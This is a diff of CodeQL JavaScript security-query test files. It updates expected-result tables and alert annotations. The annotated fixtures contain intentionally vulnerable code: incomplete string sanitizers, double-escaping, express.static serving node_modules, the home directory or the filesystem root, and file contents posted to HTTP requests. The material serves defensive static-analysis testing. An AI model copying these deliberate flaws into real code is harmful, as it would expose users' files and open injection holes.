| locatio ... ring(1) | provenance | | -| tst.js:29:9:29:82 | source | tst.js:31:18:31:23 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:33:14:33:19 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:35:28:35:33 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:37:33:37:38 | source | provenance | | -| tst.js:29:18:29:41 | documen ... .search | tst.js:29:18:29:82 | documen ... , "$1") | provenance | | -| tst.js:29:18:29:82 | documen ... , "$1") | tst.js:29:9:29:82 | source | provenance | | +| tst.js:1:6:1:27 | documen ... on.href | tst.js:1:6:1:83 | documen ... t=")+8) | provenance | | +| tst.js:11:10:11:33 | documen ... .search | tst.js:11:10:11:74 | documen ... , "$1") | provenance | | +| tst.js:17:11:17:32 | documen ... on.hash | tst.js:17:11:17:45 | documen ... ring(1) | provenance | | +| tst.js:17:11:17:45 | documen ... ring(1) | tst.js:17:6:17:46 | atob(do ... ing(1)) | provenance | | +| tst.js:19:26:19:40 | location.search | tst.js:19:26:19:53 | locatio ... ring(1) | provenance | | +| tst.js:22:9:22:82 | source | tst.js:24:18:24:23 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:26:14:26:19 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:28:28:28:33 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:30:33:30:38 | source | provenance | | +| tst.js:22:18:22:41 | documen ... .search | tst.js:22:18:22:82 | documen ... , "$1") | provenance | | +| tst.js:22:18:22:82 | documen ... , "$1") | tst.js:22:9:22:82 | source | provenance | | nodes | NoSQLCodeInjection.js:18:24:18:31 | req.body | semmle.label | req.body | | NoSQLCodeInjection.js:18:24:18:37 | req.body.query | semmle.label | req.body.query | @@ -64,24 +64,24 @@ nodes | angularjs.js:53:32:53:46 | location.search | semmle.label | location.search | | eslint-escope-build.js:20:22:20:22 | c | semmle.label | c | | eslint-escope-build.js:21:16:21:16 | c | semmle.label | c | -| express.js:7:24:7:69 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:7:44:7:62 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:9:34:9:79 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:9:54:9:72 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:12:8:12:53 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:12:28:12:46 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:15:22:15:54 | req.par ... ction") | semmle.label | req.par ... ction") | -| express.js:17:30:17:53 | req.par ... cript") | semmle.label | req.par ... cript") | -| express.js:19:37:19:70 | req.par ... odule") | semmle.label | req.par ... odule") | -| express.js:21:19:21:48 | req.par ... ntext") | semmle.label | req.par ... ntext") | -| express.js:26:9:26:35 | taint | semmle.label | taint | -| express.js:26:17:26:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:27:34:27:38 | taint | semmle.label | taint | -| express.js:34:9:34:35 | taint | semmle.label | taint | -| express.js:34:17:34:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:43:15:43:19 | taint | semmle.label | taint | -| express.js:49:30:49:32 | msg | semmle.label | msg | -| express.js:50:10:50:12 | msg | semmle.label | msg | +| express.js:6:24:6:69 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:6:44:6:62 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:7:34:7:79 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:7:54:7:72 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:9:8:9:53 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:9:28:9:46 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:11:22:11:54 | req.par ... ction") | semmle.label | req.par ... ction") | +| express.js:12:30:12:53 | req.par ... cript") | semmle.label | req.par ... cript") | +| express.js:13:37:13:70 | req.par ... odule") | semmle.label | req.par ... odule") | +| express.js:14:19:14:48 | req.par ... ntext") | semmle.label | req.par ... ntext") | +| express.js:19:9:19:35 | taint | semmle.label | taint | +| express.js:19:17:19:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:20:34:20:38 | taint | semmle.label | taint | +| express.js:27:9:27:35 | taint | semmle.label | taint | +| express.js:27:17:27:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:36:15:36:19 | taint | semmle.label | taint | +| express.js:42:30:42:32 | msg | semmle.label | msg | +| express.js:43:10:43:12 | msg | semmle.label | msg | | module.js:9:16:9:29 | req.query.code | semmle.label | req.query.code | | module.js:11:17:11:30 | req.query.code | semmle.label | req.query.code | | react-native.js:7:7:7:33 | tainted | semmle.label | tainted | @@ -105,25 +105,25 @@ nodes | template-sinks.js:31:19:31:25 | tainted | semmle.label | tainted | | template-sinks.js:32:16:32:22 | tainted | semmle.label | tainted | | template-sinks.js:33:17:33:23 | tainted | semmle.label | tainted | -| tst.js:2:6:2:27 | documen ... on.href | semmle.label | documen ... on.href | -| tst.js:2:6:2:83 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:5:12:5:33 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:14:10:14:33 | documen ... .search | semmle.label | documen ... .search | -| tst.js:14:10:14:74 | documen ... , "$1") | semmle.label | documen ... , "$1") | -| tst.js:17:21:17:42 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:20:30:20:51 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:23:6:23:46 | atob(do ... ing(1)) | semmle.label | atob(do ... ing(1)) | -| tst.js:23:11:23:32 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:23:11:23:45 | documen ... ring(1) | semmle.label | documen ... ring(1) | -| tst.js:26:26:26:40 | location.search | semmle.label | location.search | -| tst.js:26:26:26:53 | locatio ... ring(1) | semmle.label | locatio ... ring(1) | -| tst.js:29:9:29:82 | source | semmle.label | source | -| tst.js:29:18:29:41 | documen ... .search | semmle.label | documen ... .search | -| tst.js:29:18:29:82 | documen ... , "$1") | semmle.label | documen ... , "$1") | -| tst.js:31:18:31:23 | source | semmle.label | source | -| tst.js:33:14:33:19 | source | semmle.label | source | -| tst.js:35:28:35:33 | source | semmle.label | source | -| tst.js:37:33:37:38 | source | semmle.label | source | +| tst.js:1:6:1:27 | documen ... on.href | semmle.label | documen ... on.href | +| tst.js:1:6:1:83 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:3:12:3:33 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:11:10:11:33 | documen ... .search | semmle.label | documen ... .search | +| tst.js:11:10:11:74 | documen ... , "$1") | semmle.label | documen ... , "$1") | +| tst.js:13:21:13:42 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:15:30:15:51 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:17:6:17:46 | atob(do ... ing(1)) | semmle.label | atob(do ... ing(1)) | +| tst.js:17:11:17:32 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:17:11:17:45 | documen ... ring(1) | semmle.label | documen ... ring(1) | +| tst.js:19:26:19:40 | location.search | semmle.label | location.search | +| tst.js:19:26:19:53 | locatio ... ring(1) | semmle.label | locatio ... ring(1) | +| tst.js:22:9:22:82 | source | semmle.label | source | +| tst.js:22:18:22:41 | documen ... .search | semmle.label | documen ... .search | +| tst.js:22:18:22:82 | documen ... , "$1") | semmle.label | documen ... , "$1") | +| tst.js:24:18:24:23 | source | semmle.label | source | +| tst.js:26:14:26:19 | source | semmle.label | source | +| tst.js:28:28:28:33 | source | semmle.label | source | +| tst.js:30:33:30:38 | source | semmle.label | source | | webix/webix.html:3:16:3:37 | documen ... on.hash | semmle.label | documen ... on.hash | | webix/webix.html:4:26:4:47 | documen ... on.hash | semmle.label | documen ... on.hash | | webix/webix.html:5:47:5:68 | documen ... on.hash | semmle.label | documen ... on.hash | diff --git a/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.expected b/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.expected index b8b29a028c25..db091b03406c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.expected +++ b/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.expected @@ -1,8 +1,8 @@ -| tst-httpOnly.js:11:9:15:2 | session ... BAD\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:11:9:15:2 | session ... lert\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:29:9:29:21 | session(sess) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:38:9:38:22 | session(sess2) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:47:9:47:22 | session(sess3) | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:51:9:55:2 | session ... BAD\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:51:9:55:2 | session ... lert\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:68:5:73:10 | res.coo ... }) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:78:5:81:10 | res.coo ... }) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:101:5:101:43 | res.coo ... ptions) | Sensitive server cookie is missing 'httpOnly' flag. | @@ -12,9 +12,9 @@ | tst-httpOnly.js:148:5:148:41 | res.coo ... ptions) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:159:5:159:43 | res.coo ... ptions) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:170:5:170:40 | res.coo ... ptions) | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:209:37:209:51 | "authKey=ninja" | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:229:38:229:52 | "authKey=ninja" | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:289:37:289:59 | `authKe ... {attr}` | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:303:9:307:2 | session ... BAD\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:320:9:324:2 | session ... tter\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:330:37:330:68 | "sessio ... onKey() | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:208:37:208:51 | "authKey=ninja" | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:227:38:227:52 | "authKey=ninja" | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:287:37:287:59 | `authKe ... {attr}` | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:301:9:305:2 | session ... lert\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:318:9:322:2 | session ... tter\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:328:37:328:68 | "sessio ... onKey() | Sensitive server cookie is missing 'httpOnly' flag. | diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteMultiCharacterSanitization.expected b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteMultiCharacterSanitization.expected index 96a48fec6cb8..22b3868a62a8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteMultiCharacterSanitization.expected +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteMultiCharacterSanitization.expected @@ -18,25 +18,25 @@ | tst-multi-character-sanitization.js:83:7:83:63 | x.repla ... gi, "") | This string may still contain $@, which may cause an HTML element injection vulnerability. | tst-multi-character-sanitization.js:83:18:83:21 | | Missing result: Alert | +| polyfill-nocheck.html:4:9:4:98 | Content loaded from untrusted domain with no integrity check. | Unexpected result: Alert | diff --git a/javascript/ql/test/query-tests/Security/CWE-830/FunctionalityFromUntrustedSource.expected b/javascript/ql/test/query-tests/Security/CWE-830/FunctionalityFromUntrustedSource.expected index c97e109441dd..acafaf1a7be7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-830/FunctionalityFromUntrustedSource.expected +++ b/javascript/ql/test/query-tests/Security/CWE-830/FunctionalityFromUntrustedSource.expected @@ -1,3 +1,4 @@ +#select | DynamicCreationOfUntrustedSourceUse.html:18:28:18:129 | ('https ... /ga.js' | Script loaded using unencrypted connection. | | DynamicCreationOfUntrustedSourceUse.html:21:26:21:50 | 'http:/ ... e.com/' | Iframe loaded using unencrypted connection. | | DynamicCreationOfUntrustedSourceUse.html:31:27:31:40 | getUrl('v123') | Iframe loaded using unencrypted connection. | @@ -5,3 +6,12 @@ | StaticCreationOfUntrustedSourceUse.html:6:9:6:56 | + {/* $ Alert[js/code-injection] */}
    ); diff --git a/javascript/ql/test/query-tests/Security/CWE-116/DoubleEscaping/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/DoubleEscaping/tst.js index 72ea3df20038..5c31272ac5a2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/DoubleEscaping/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/DoubleEscaping/tst.js @@ -1,7 +1,7 @@ function badEncode(s) { return s.replace(/"/g, """) .replace(/'/g, "'") - .replace(/&/g, "&"); + .replace(/&/g, "&"); // $ Alert } function goodEncode(s) { @@ -17,7 +17,7 @@ function goodDecode(s) { } function badDecode(s) { - return s.replace(/&/g, "&") + return s.replace(/&/g, "&") // $ Alert .replace(/"/g, "\"") .replace(/'/g, "'"); } @@ -27,7 +27,7 @@ function cleverEncode(code) { } function badDecode2(s) { - return s.replace(/&/g, "&") + return s.replace(/&/g, "&") // $ Alert .replace(/s?ome|thin*g/g, "else") .replace(/'/g, "'"); } @@ -44,20 +44,20 @@ function goodDecodeInLoop(ss) { } function badDecode3(s) { - s = s.replace(/&/g, "&"); + s = s.replace(/&/g, "&"); // $ Alert s = s.replace(/"/g, "\""); return s.replace(/'/g, "'"); } function badUnescape(s) { - return s.replace(/\\\\/g, '\\') + return s.replace(/\\\\/g, '\\') // $ Alert .replace(/\\'/g, '\'') .replace(/\\"/g, '\"'); } function badPercentEscape(s) { s = s.replace(/&/g, '%26'); - s = s.replace(/%/g, '%25'); + s = s.replace(/%/g, '%25'); // $ Alert return s; } @@ -67,7 +67,7 @@ function badEncode(s) { var indirect3 = /&/g; return s.replace(indirect1, """) .replace(indirect2, "'") - .replace(indirect3, "&"); + .replace(indirect3, "&"); // $ Alert } function badEncodeWithReplacer(s) { @@ -76,7 +76,7 @@ function badEncodeWithReplacer(s) { "'": "'", "&": "&" }; - return s.replace(/["']/g, (c) => repl[c]).replace(/&/g, "&"); + return s.replace(/["']/g, (c) => repl[c]).replace(/&/g, "&"); // $ Alert } // dubious, but out of scope for this query diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js index 6f34830bf770..e18b45880bd3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js @@ -2,71 +2,71 @@ let express = require('express'); var app = express(); function bad1(s) { - return s.replace("'", ""); // $ Alert + return s.replace("'", ""); // $ Alert[js/incomplete-sanitization] } function bad2(s) { - return s.replace(/'/, ""); // $ Alert + return s.replace(/'/, ""); // $ Alert[js/incomplete-sanitization] } function bad3(s) { - return s.replace(/'/g, "\\'"); // $ Alert + return s.replace(/'/g, "\\'"); // $ Alert[js/incomplete-sanitization] } function bad4(s) { - return s.replace(/'/g, "\\$&"); // $ Alert + return s.replace(/'/g, "\\$&"); // $ Alert[js/incomplete-sanitization] } function bad5(s) { - return s.replace(/['"]/g, "\\$&"); // $ Alert + return s.replace(/['"]/g, "\\$&"); // $ Alert[js/incomplete-sanitization] } function bad6(s) { - return s.replace(/(['"])/g, "\\$1"); // $ Alert + return s.replace(/(['"])/g, "\\$1"); // $ Alert[js/incomplete-sanitization] } function bad7(s) { - return s.replace(/('|")/g, "\\$1"); // $ Alert + return s.replace(/('|")/g, "\\$1"); // $ Alert[js/incomplete-sanitization] } function bad8(s) { - return s.replace('|', ''); // $ Alert + return s.replace('|', ''); // $ Alert[js/incomplete-sanitization] } function bad9(s) { - return s.replace(/"/g, "\\\""); // $ Alert + return s.replace(/"/g, "\\\""); // $ Alert[js/incomplete-sanitization] } function bad10(s) { - return s.replace("/", "%2F"); // $ Alert + return s.replace("/", "%2F"); // $ Alert[js/incomplete-sanitization] } function bad11(s) { - return s.replace("%25", "%"); // $ Alert + return s.replace("%25", "%"); // $ Alert[js/incomplete-sanitization] } function bad12(s) { - return s.replace(`'`, ""); // $ Alert + return s.replace(`'`, ""); // $ Alert[js/incomplete-sanitization] } function bad13(s) { - return s.replace("'", ``); // $ Alert + return s.replace("'", ``); // $ Alert[js/incomplete-sanitization] } function bad14(s) { - return s.replace(`'`, ``); // $ Alert + return s.replace(`'`, ``); // $ Alert[js/incomplete-sanitization] } function bad15(s) { - return s.replace("'" + "", ""); // $ Alert + return s.replace("'" + "", ""); // $ Alert[js/incomplete-sanitization] } function bad16(s) { - return s.replace("'", "" + ""); // $ Alert + return s.replace("'", "" + ""); // $ Alert[js/incomplete-sanitization] } function bad17(s) { - return s.replace("'" + "", "" + ""); // $ Alert + return s.replace("'" + "", "" + ""); // $ Alert[js/incomplete-sanitization] } function good1(s) { @@ -130,23 +130,23 @@ function good12(s) { s.replace('[', '').replace(']', ''); s.replace('(', '').replace(')', ''); s.replace('{', '').replace('}', ''); - s.replace('<', '').replace('>', ''); // $ Alert - too common as a bad HTML sanitizer + s.replace('<', '').replace('>', ''); // too common as a bad HTML sanitizer - s.replace('[', '\\[').replace(']', '\\]'); // $ Alert - s.replace('{', '\\{').replace('}', '\\}'); // $ Alert + s.replace('[', '\\[').replace(']', '\\]'); + s.replace('{', '\\{').replace('}', '\\}'); s = s.replace('[', ''); s = s.replace(']', ''); - s.replace(/{/, '').replace(/}/, ''); // $ Alert - should have used a string literal if a single replacement was intended - s.replace(']', '').replace('[', ''); // probably OK, but still flagged + s.replace(/{/, '').replace(/}/, ''); // should have used a string literal if a single replacement was intended + s.replace(']', '').replace('[', ''); // $ Alert[js/incomplete-sanitization] - probably OK, but still flagged } function newlines(s) { // motivation for whitelist require("child_process").execSync("which emacs").toString().replace("\n", ""); - x.replace("\n", "").replace(x, y); // $ Alert - x.replace(x, y).replace("\n", ""); // $ Alert + x.replace("\n", "").replace(x, y); + x.replace(x, y).replace("\n", ""); } app.get('/some/path', function(req, res) { @@ -190,7 +190,7 @@ app.get('/some/path', function(req, res) { (function (s) { var indirect = /'/; - return s.replace(indirect, ""); // $ Alert + return s.replace(indirect, ""); // $ Alert[js/incomplete-sanitization] }); (function (s) { @@ -199,20 +199,20 @@ app.get('/some/path', function(req, res) { }); function bad18(p) { - return p.replace("/../", ""); // $ Alert + return p.replace("/../", ""); // $ Alert[js/incomplete-sanitization] } function typicalBadHtmlSanitizers(s) { - s().replace(/[<>]/g,''); // $ Alert - s().replace(/[<>&]/g, ''); // $ Alert - s().replace(/[<>"]/g, ''); // $ Alert - s().replace(//g, ''); // $ Alert - s().replace(//g, '').replace(/&/g, ''); // $ Alert - s().replace(//g, ''); // $ Alert - s().replace(/&/g, '').replace(/>/g, '').replace(/]/g,''); + s().replace(/[<>&]/g, ''); + s().replace(/[<>"]/g, ''); + s().replace(//g, ''); + s().replace(//g, '').replace(/&/g, ''); + s().replace(//g, ''); + s().replace(/&/g, '').replace(/>/g, '').replace(//g, ''); // $ Alert + s = s.replace(/>/g, ''); s().replace(//g, '>').replace(/&/g, '&').replace(/"/g, '"'); s().replace(//g, '>').replace(/&/g, '&').replace(/'/g, '''); // OK - single quotes or double quotes both work @@ -306,7 +306,7 @@ function incompleteHtmlAttributeSanitization2() { } function incompleteComplexSanitizers() { - '=\'' + s().replace(/[&<>"]/gm, function (str) { // $ Alert + '=\'' + s().replace(/[&<>"]/gm, function (str) { if (str === "&") return "&"; if (str === "<") @@ -315,7 +315,7 @@ function incompleteComplexSanitizers() { return ">"; if (str === "\"") return """; - }) + '\''; + }) + '\''; // $ Alert[js/incomplete-html-attribute-sanitization] '="' + s().replace(/[&<>"]/gm, function (str) { if (str === "&") @@ -330,27 +330,27 @@ function incompleteComplexSanitizers() { } function typicalBadHtmlSanitizers(s) { - s().replace(new RegExp("[<>]", "g"),''); // $ Alert + s().replace(new RegExp("[<>]", "g"),''); } function typicalBadHtmlSanitizers(s) { - s().replace(new RegExp("[<>]", unknown()),''); // $ Alert + s().replace(new RegExp("[<>]", unknown()),''); } function bad18NewRegExp(p) { - return p.replace(new RegExp("\\.\\./"), ""); // $ Alert + return p.replace(new RegExp("\\.\\./"), ""); } function bad4NewRegExpG(s) { - return s.replace(new RegExp("\'","g"), "\\$&"); // $ Alert + return s.replace(new RegExp("\'","g"), "\\$&"); // $ Alert[js/incomplete-sanitization] } function bad4NewRegExp(s) { - return s.replace(new RegExp("\'"), "\\$&"); // $ Alert + return s.replace(new RegExp("\'"), "\\$&"); // $ Alert[js/incomplete-sanitization] } function bad4NewRegExpUnknown(s) { - return s.replace(new RegExp("\'", unknownFlags()), "\\$&"); // $ Alert + return s.replace(new RegExp("\'", unknownFlags()), "\\$&"); // $ Alert[js/incomplete-sanitization] } function newlinesNewReGexp(s) { @@ -359,8 +359,8 @@ function newlinesNewReGexp(s) { x.replace(new RegExp("\n", "g"), "").replace(x, y); x.replace(x, y).replace(new RegExp("\n", "g"), ""); - x.replace(new RegExp("\n"), "").replace(x, y); // $ Alert - x.replace(x, y).replace(new RegExp("\n"), ""); // $ Alert + x.replace(new RegExp("\n"), "").replace(x, y); // $ Alert[js/incomplete-sanitization] + x.replace(x, y).replace(new RegExp("\n"), ""); // $ Alert[js/incomplete-sanitization] x.replace(new RegExp("\n", unknownFlags()), "").replace(x, y); x.replace(x, y).replace(new RegExp("\n", unknownFlags()), ""); diff --git a/javascript/ql/test/query-tests/Security/CWE-178/tst.js b/javascript/ql/test/query-tests/Security/CWE-178/tst.js index 4d320438eb54..9394d6303fa0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-178/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-178/tst.js @@ -88,7 +88,7 @@ app.get('/baz3/a', (req, resp) => { resp.send({ test: 123 }); }); -app.use(/\/summonerByName|\/currentGame/,apiLimit1, apiLimit2); +app.use(/\/summonerByName|\/currentGame/,apiLimit1, apiLimit2); // $ Alert app.get('/currentGame', function (req, res) { res.send("FOO"); diff --git a/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.js b/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.js index 4509c3c6cc76..d197c141cb14 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.js @@ -7,4 +7,4 @@ https.get({ path: "/upload", method: "GET", headers: { Referer: content } -}, () => { }); +}, () => { }); // $ Alert[js/file-access-to-http] diff --git a/javascript/ql/test/query-tests/Security/CWE-200/lib/tst.js b/javascript/ql/test/query-tests/Security/CWE-200/lib/tst.js index b534af05b92f..23c29cde28ad 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/lib/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/lib/tst.js @@ -4,8 +4,8 @@ var path = require("path"); var app = express(); -app.use('basedir', express.static(__dirname)); // $ Alert +app.use('basedir', express.static(__dirname)); // $ Alert[js/exposure-of-private-files] const rootDir = __dirname; -app.use('basedir', express.static(rootDir)); // $ Alert +app.use('basedir', express.static(rootDir)); // $ Alert[js/exposure-of-private-files] -app.use('/monthly', express.static(__dirname + '/')); // $ Alert \ No newline at end of file +app.use('/monthly', express.static(__dirname + '/')); // $ Alert[js/exposure-of-private-files] \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js b/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js index d1199c259e3e..c3aaec3926ff 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js @@ -5,21 +5,21 @@ var path = require("path"); var app = express(); // Not good. -app.use(express.static('./node_modules/angular')); -app.use('/angular', express.static('node_modules/angular')); -app.use('/animate', express.static('node_modules/angular-animate')); -app.use('/js', express.static(__dirname + '/node_modules/angular')); -app.use('/router', express.static(__dirname + '/node_modules/angular-route/')); -app.use(express.static('/node_modules/angular')); -app.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules'))); -app.use('/js',express.static('./')); -app.use('/angular', express.static("./node_modules" + '/angular/')); -app.use('/angular', express.static(path.join("./node_modules" + '/angular/'))); -app.use('/angular', express.static(path.join(__dirname, "/node_modules"))); -app.use('/angular', express.static(path.join(__dirname, "/node_modules") + '/angular/')); +app.use(express.static('./node_modules/angular')); // $ Alert[js/exposure-of-private-files] +app.use('/angular', express.static('node_modules/angular')); // $ Alert[js/exposure-of-private-files] +app.use('/animate', express.static('node_modules/angular-animate')); // $ Alert[js/exposure-of-private-files] +app.use('/js', express.static(__dirname + '/node_modules/angular')); // $ Alert[js/exposure-of-private-files] +app.use('/router', express.static(__dirname + '/node_modules/angular-route/')); // $ Alert[js/exposure-of-private-files] +app.use(express.static('/node_modules/angular')); // $ Alert[js/exposure-of-private-files] +app.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules'))); // $ Alert[js/exposure-of-private-files] +app.use('/js',express.static('./')); // $ Alert[js/exposure-of-private-files] +app.use('/angular', express.static("./node_modules" + '/angular/')); // $ Alert[js/exposure-of-private-files] +app.use('/angular', express.static(path.join("./node_modules" + '/angular/'))); // $ Alert[js/exposure-of-private-files] +app.use('/angular', express.static(path.join(__dirname, "/node_modules"))); // $ Alert[js/exposure-of-private-files] +app.use('/angular', express.static(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert[js/exposure-of-private-files] const rootDir = __dirname; const nodeDir = path.join(rootDir + "/node_modules"); -app.use('/angular', express.static(nodeDir + '/angular/')); +app.use('/angular', express.static(nodeDir + '/angular/')); // $ Alert[js/exposure-of-private-files] @@ -37,10 +37,10 @@ app.use('basedir', express.static(__dirname)); // OK - because there is no packa app.use('/monthly', express.static(__dirname + '/')); // OK - because there is no package.json in the same folder. const connect = require("connect"); -app.use('/angular', connect.static(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert -app.use('/angular', require('serve-static')(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert -app.use('/home', require('serve-static')(require("os").homedir())); // $ Alert -app.use('/root', require('serve-static')("/")); // $ Alert +app.use('/angular', connect.static(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert[js/exposure-of-private-files] +app.use('/angular', require('serve-static')(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert[js/exposure-of-private-files] +app.use('/home', require('serve-static')(require("os").homedir())); // $ Alert[js/exposure-of-private-files] +app.use('/root', require('serve-static')("/")); // $ Alert[js/exposure-of-private-files] // Bad documentation example function bad() { @@ -48,7 +48,7 @@ function bad() { var app = express(); - app.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules'))); // $ Alert + app.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules'))); // $ Alert[js/exposure-of-private-files] } // Good documentation example @@ -67,7 +67,7 @@ const serveHandler = require("serve-handler"); const http = require("http"); http.createServer((request, response) => { - serveHandler(request, response, {public: "./node_modules/angular"}); // $ Alert + serveHandler(request, response, {public: "./node_modules/angular"}); // $ Alert[js/exposure-of-private-files] serveHandler(request, response); }).listen(8080); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-200/readFileSync.js b/javascript/ql/test/query-tests/Security/CWE-200/readFileSync.js index dc86544b5d36..5c4df5220b80 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/readFileSync.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/readFileSync.js @@ -22,7 +22,7 @@ try { res.setEncoding('utf8'); }); - post_req.write(s); // $ Alert - post the data from file to request body + post_req.write(s); // $ Alert[js/file-access-to-http] - post the data from file to request body post_req.end(); } catch (e) { } diff --git a/javascript/ql/test/query-tests/Security/CWE-200/readStreamRead.js b/javascript/ql/test/query-tests/Security/CWE-200/readStreamRead.js index d20c27d0eae7..506eead886cf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/readStreamRead.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/readStreamRead.js @@ -26,7 +26,7 @@ fs.exists(fileName, function (exists) { res.setEncoding('utf8'); }); - req.write(chunk); // $ Alert - write data from file to request body + req.write(chunk); // $ Alert[js/file-access-to-http] - write data from file to request body req.end(); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-200/request.js b/javascript/ql/test/query-tests/Security/CWE-200/request.js index 22097c49f5ed..13c98c8fd939 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/request.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/request.js @@ -19,8 +19,8 @@ function PostXML(xmlData) headers: { "content-type": "application/xml", }, - body: xmlData // $ Alert - passing data from file to the request body - }, function (error, response, body){ + body: xmlData // passing data from file to the request body + }, function (error, response, body){ // $ Alert[js/file-access-to-http] console.log(response); }); } diff --git a/javascript/ql/test/query-tests/Security/CWE-200/sentAsHeaders.js b/javascript/ql/test/query-tests/Security/CWE-200/sentAsHeaders.js index f663e9f286da..9bd2122a183b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/sentAsHeaders.js +++ 